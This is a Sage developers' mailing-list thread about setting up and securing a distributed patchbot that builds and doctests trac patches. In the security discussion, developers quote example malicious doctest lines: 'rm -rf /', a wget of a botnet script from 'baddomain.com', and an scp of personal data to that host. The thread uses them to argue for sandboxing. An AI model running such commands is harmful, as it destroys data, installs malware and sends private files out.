1) Download and build a pristine copy of Sage for testing.
2) Apply http://trac.sagemath.org/sage_trac/ticket/12486 to the
sage-scripts directory.
3) Run sage --patchbot
Everyone's results will be consolidated at
http://patchbot.sagemath.org/ . Hopefully this will allow us to get
results from wide variety of architectures, platforms, and versions.
- Robert
Whatever it takes to build/test Sage these days for RAM, plus disk
space for a single Sage install + 100MB/ticket disk.
> * Does this distributed patchbot always delete the patches when it's
> done?
It keeps them around until the ticket is closed. It could be worth
making this configurable.
> * Can one stop the patchbot if one wants to do something else on the
> computer without ill effect?
Yes. The ticket will be marked as "pending" for the next 12 hours or
so if you never report any results, but that's the only ill effect.
You can also specify hours of the day that you want it to run, e.g.
"22-7,10-16" for 10pm-7am, 10am-4pm. Day of week could be valuable as
well.
> * What kind of network authorization would be needed?
You need to be able to connect to http://patchbot.sagemath.org and
http://trac.sagemath.org/
> * Firewalls?
> * Etc.
Nothing else really, though some precaution should be taken as you're
building and running arbitrary code (by default from people with a
trac account and a previously accepted patch, though you can customize
this as well).
> Some stuff seems less than 100% doctested as well :)
Yeah, there's lots of room for improvement, but waiting around until I
have time to add everything I'd like to hasn't worked out the last 6
months, and my life is about to get a whole lot busier, so it's time
to get this out and let other people use and contribute too.
> But it's a great idea, if this is as easy as doing sage --patchbot and
> letting it run over a weekend.
Yep, that's the goal.
- Robert
There are maybe two tweaks to these directions I'd suggest:
(2a) I wasn't sure what the sage-scripts directory was; there's
nothing by that name in my 4.8. There's a sage_scripts spkg but it
seems to put a lot of stuff in local/bin, which seems to work.
(2b) To avoid a "Permission denied" error when running sage
--patchbot, you have to make patchbot.py executable.
The second one's obvious, the first one took me a few minutes to find
the right directory..
Doug
Yep.
> (2b) To avoid a "Permission denied" error when running sage
> --patchbot, you have to make patchbot.py executable.
>
> The second one's obvious, the first one took me a few minutes to find
> the right directory..
D'oh, hg export doesn't preserve the permission bit by default.
Ironically, both of these points are very relevant to the recent "log
messages" thread.
On Fri, Feb 10, 2012 at 12:16 PM, kcrisman <kcri...@gmail.com> wrote:
> Thanks so much for the answers to all this, Robert.
>
>> > What are the resource requirements on something like this? For
>> > example,
>>
>> > * How many free MB should be always available?
>>
>> Whatever it takes to build/test Sage these days for RAM, plus disk
>> space for a single Sage install + 100MB/ticket disk.
>
> Hmm, 100MB per ticket is actually nontrivial on older machines.
True, though for modern hardware, this comes out to about $0.01/ticket.
>> > * Does this distributed patchbot always delete the patches when it's
>> > done?
>>
>> It keeps them around until the ticket is closed. It could be worth
>> making this configurable.
>
> For sure on older machines.
>
>> > * Can one stop the patchbot if one wants to do something else on the
>> > computer without ill effect?
>>
>> Yes. The ticket will be marked as "pending" for the next 12 hours or
>> so if you never report any results, but that's the only ill effect.
>> You can also specify hours of the day that you want it to run, e.g.
>> "22-7,10-16" for 10pm-7am, 10am-4pm. Day of week could be valuable as
>> well.
>
> I would have *never* guessed this from the patch! I finally found
> where this happens. Maybe you could post a "sample" conf file to the
> ticket as well using all the options; that would be a middle ground
> between the current patch and full docs.
See line 360+ of patchbot.py for the "default" config file. I'll try
to answer any other questions anyone has as well which should also
help fill the gap.
> On a more personal note, I am always amazed by the programming ability
> and motivation of some of the core developers, naturally including
> yourself and all the things you've contributed over the years.
> Jeroen's release script and Jason's work on the notebook/Sagecell come
> to mind too. I can only watch in admiration - way to go!
Thanks!
> Is the "get a whole lot busier" due to child # x, for some x>2?
Yep, numbers 3 and 4. Any day now...
- Robert
I'll start one on the KAIST Sage server (sagenb.kaist.ac.kr), an 8-core
Xeon machine running Ubuntu 10.04.3.
We should definitely do this on skynet and the OS X machines at the UW
(sqrt5.cs.washington.edu or whatever). Getting automatic testing on all
those machines would be great.
Dan
--
--- Dan Drake
----- http://mathsci.kaist.ac.kr/~drake
-------
See the attached log. On my machine, sandpile.py *always* times out. I
will try running the patchbot with a longer SAGE_TIMEOUT, but perhaps it
should recover a bit more gracefully from this situation. (Assuming the
timeout caused the exception.)
If sandpile.py *always* times out on you rmachine, this is the
expected behavior. I think at this point manual intervention is
required. Or was there something else you were thinking it should do
(because clearly you were surprised, which isn't the intent).
- Robert
It does always timeout. The regular doctests take 1300 seconds for
sandpile.py! I need to figure out what's going on there.
> I think at this point manual intervention is required. Or was there
> something else you were thinking it should do (because clearly you
> were surprised, which isn't the intent).
Well, I wasn't *too* surprised. I guess I was hoping for everything to
work perfectly with no intervention. But it does seem to be working now,
with a longer timeout.
Yikes!
I'm still worried -- what if some jerk posts a patch to trac that contains
sage: os.system('rm -rf /')
Got you!
I think a patch like the above is a very real possibility. All that
would have to happen would be for one of the 500 trac accounts (which
sometimes have very dumb passwords) to be compromised, or for somebody
to get a trac account, and boom -- some users running a patchbot loose
everything. That's not a pretty thought.
We could at least check that $HOME appears to be nearly empty, when
the patchbot starts up, suggesting that this isn't the user's normal
account. Or we could require that the username contain some string
like "sage", again forcing the user to at least make a special account
for the patchbot.
-- William
>
> Now I'm looking for where the patchbot might have left some residue of
> its doings so that I can make sure this doesn't happen again (perhaps
> by setting some configuration thingie). But I can really only find
> the local/bin/patchbot folder, which doesn't seem to have a log.
>
> So I now have two questions:
>
> 1) Can I configure so that it runs ONE thread at a time? I noticed it
> was running 3 threads... on a machine with one processor at < 1 GHz.
> I didn't see a place for setting this in the patchbot - is that the
> "parallelism": 3 setting? Perhaps "doctest_threads" or something
> could be an alternate setting. In any case, this should be a little
> more sophisticated than 3 as a default - maybe number of cores +1 or
> something. I hope this is what the problem I had was.
>
> 2) Is there a log? Or more precisely, is there one on *my* machine?
>
> 3) Finally, although http://patchbot.sagemath.org/ticket/ is pretty
> nice, I couldn't find a way to do a query for what my particular
> machine had tested. http://patchbot.sagemath.org/ticket/?base=4.8
> would be it, but that's pretty broad, and you have to click on a
> ticket to see which machines did it.
>
> Thanks! Overall this should be very helpful, though, especially for
> checking whether things apply to more recent alphas/betas.
>
> - kcrisman
>
> --
> To post to this group, send an email to sage-...@googlegroups.com
> To unsubscribe from this group, send an email to sage-devel+...@googlegroups.com
> For more options, visit this group at http://groups.google.com/group/sage-devel
> URL: http://www.sagemath.org
--
William Stein
Professor of Mathematics
University of Washington
http://wstein.org
or
sage: email('SPAM MESSAGE')
hahaha
or
sage: os.system('wget ...') # download rootkit
pwned!
or
sage: os.system("wget http://baddomain.com/joinbotnet.sh")
sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
sage: os.system("joinbotnet.sh")
I would definitely want this thing sandboxed as much as possible,
preferably running on a virtual machine that is completely firewalled
off from the net, except communication with the patch server.
Really, if you are running a patchbot, you are giving everyone in the
world permission to execute arbitrary code as the patchbot user.
Jason
A virtual machine would be really good because it will normalize
*what* compute the tests are being run on. It's bad because of the
same reason, I guess.
But if the point of lots of people running patchbots is that we don't
have enough compute power on sage.math to do it, then using a
virtualmachine seems like by far the best option. If it is to test on
a wide variety of OS/hardware combinations, then it is a bad option.
-- William
:(. There are log files in $SAGE_ROOT/logs/xxxx-log.txt . Still, it's
just running sage -tp 3.
> So I now have two questions:
>
> 1) Can I configure so that it runs ONE thread at a time? I noticed it
> was running 3 threads... on a machine with one processor at < 1 GHz.
> I didn't see a place for setting this in the patchbot - is that the
> "parallelism": 3 setting?
OK, that might explain it. Yes, set "parallelism": 1. And nice it of
course as well.
> Perhaps "doctest_threads" or something
> could be an alternate setting. In any case, this should be a little
> more sophisticated than 3 as a default - maybe number of cores +1 or
> something. I hope this is what the problem I had was.
Note that it's for building as well as doctesting, so I think
"parallelism" is a fine name. Defaulting number of cores + 1 could be
a bad default for a shared machine with lots of cores (and 2 may not
be the best default for a 1-core machine). But, yes, it could be more
intelligent.
> 2) Is there a log? Or more precisely, is there one on *my* machine?
Yep, see above.
> 3) Finally, although http://patchbot.sagemath.org/ticket/ is pretty
> nice, I couldn't find a way to do a query for what my particular
> machine had tested. http://patchbot.sagemath.org/ticket/?base=4.8
> would be it, but that's pretty broad, and you have to click on a
> ticket to see which machines did it.
+1, I've wanted this too, but never got around to implementing it.
(Should be easy.) Note that the tickets are sorted in "last activity"
order.
> Thanks! Overall this should be very helpful, though, especially for
> checking whether things apply to more recent alphas/betas.
Yep. People can run patchbots on a variety of architectures and
versions of Sage.
- Robert
I would think that these are the set of files that would be most
likely to be tested by a user before submitting... the advantage of
the patchbot is that it tests everything, catching unexpected
breakages, and doing the long-running work without manual
intervention. But this could be useful for running it manually (but
should *not* give an "all tests passed" result until all tests are
run).
- Robert
It turns out that sage.math does have enough compute power to keep up,
though not always with low latency, and being able to test against
different versions is useful to. But the main point is to test a wide
variety of OS/hardware combinations.
- Robert
Hence my previous comment:
"Precaution should be taken as you're
building and running arbitrary code (by default from people with a
trac account and a previously accepted patch, though you can customize
this as well)."
I should have been stronger.
For most of its life, the patchbot executed code from a whitelist of
authors, which is a good place to start (but requires a fair amount of
manual maintenance). Unfortunately, this doesn't cover the issue of
account compromise. Ideally we would sign patches and then we could
check the signatures. Something like code.google.com or github would
provide stronger authentication guarantees than our own trac server.
And of course running things in a jail/vm/separate account is
worthwhile.
> We could at least check that $HOME appears to be nearly empty, when
> the patchbot starts up, suggesting that this isn't the user's normal
> account. Or we could require that the username contain some string
> like "sage", again forcing the user to at least make a special account
> for the patchbot.
That's not a bad idea. I think we should have a strong VM to test
everything, and individuals can test more "trusted" patches with their
own thresholds of security.
- Robert
True.
>> the patchbot is that it tests everything, catching unexpected
>> breakages, and doing the long-running work without manual
>> intervention. But this could be useful for running it manually (but
>> should *not* give an "all tests passed" result until all tests are
>> run).
>
> Well, that would be feature request in any case. But is there syntax
> yet for doing
>
> sage --patchbot -t 12345
>
> ? This would seem to solve the problem of having to manually add
> patch files (I assume this would one of the advantages of the "pull"
> system) and then automatically tests them to boot.
This is really getting into the fact that our workflow is so
cumbersome we want to adapt the patchbot to do stuff like this.
> Then one could
> avoid the hacker problem.
>
> Of course, that sort of misses the point of the patchbot in general.
> But VMs can't totally help, because presumably some of the point is
> different/weird OS/architectures, right? Could there be a way to
> strip for which user uploaded said patches and have a whitelist of
> those, at least as a configuration item?
Yes, that's implemented. By default it only tries patches uploaded
from users who uploaded patches in previously merged tickets, but you
can set the trusted_authors to any list of (trac) users you want.
Being able to specify a list of trusted ticket numbers (taking a
snapshot of the patches at that point) could be handy too.
> (User names in the patch
> itself could be easily faked, of course.) Or maybe a whitelist of
> tickets... I don't know that anyone would want to maintain these,
> though.
The best option is signing patches and a whitelist of trusted users.
We could even allow it to be transitive, i.e. I'll trust anyone that
William trusts.
And of course even then a separate account, etc. is still valuable.
- Robert